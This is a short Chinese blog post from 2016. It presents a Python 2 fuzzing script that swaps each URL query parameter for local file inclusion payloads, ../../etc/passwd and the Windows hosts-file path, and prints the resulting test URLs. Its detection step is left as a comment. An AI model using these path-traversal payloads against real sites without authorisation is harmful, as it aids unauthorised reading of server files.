利用Python开发Fuzz漏洞插件

Python 2016-09-30

#-*- coding:utf-8 -*-
#code by Mosuan
#2016.09.30
import urlparse
import urllib
import sys

def GetUrl(url, payload):
    urllist = urlparse.urlparse(url)
    if urllist.query != '':
        #生成没有参数的原url
        url_host = "%s://%s%s?" % (urllist.scheme,urllist.netloc,urllist.path)
        #将参数和值变成字典键值对 keep_blank_values=True的时候不会忽略掉value为空
        url_query = dict(urlparse.parse_qsl(urllist.query,keep_blank_values=True))
        for x in payload:
            for key in url_query:
                url_query[key] = x['payload']
                url_query_arr = urllib.unquote(urllib.urlencode(url_query))
                url_file_include = url_host+url_query_arr
                #最后在这里判断漏洞是否存在
                print url_file_include
                #再次将参数变成原始数据,避免数据污染
                url_query = dict(urlparse.parse_qsl(urllist.query,keep_blank_values=True))
    else:
        print u'没有参数跑个卵蛋'

'''
type == 跟正则匹配,如header,就是取header来判断是否存在漏洞
payload == 顾名思义
content == 最后存在漏洞输出的,如存在xxxx
reg == 正则判断漏洞是否存在
'''
payload = [
    {
        "type":"content",
        "payload":"../../../../../../../etc/passwd",
        "content":u"文件包含",
        "reg":r""
    },
    {
        "type":"content",
        "payload":"C:\\Windows\\System32\\drivers\\etc\\hosts",
        "content":u"文件包含",
        "reg":r""
    }
]

if __name__ in "__main__":
    if len(sys.argv) >= 2:
        url = sys.argv[1]
        GetUrl(url, payload)

效果图:
xxx.png


本文由 Mosuan 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论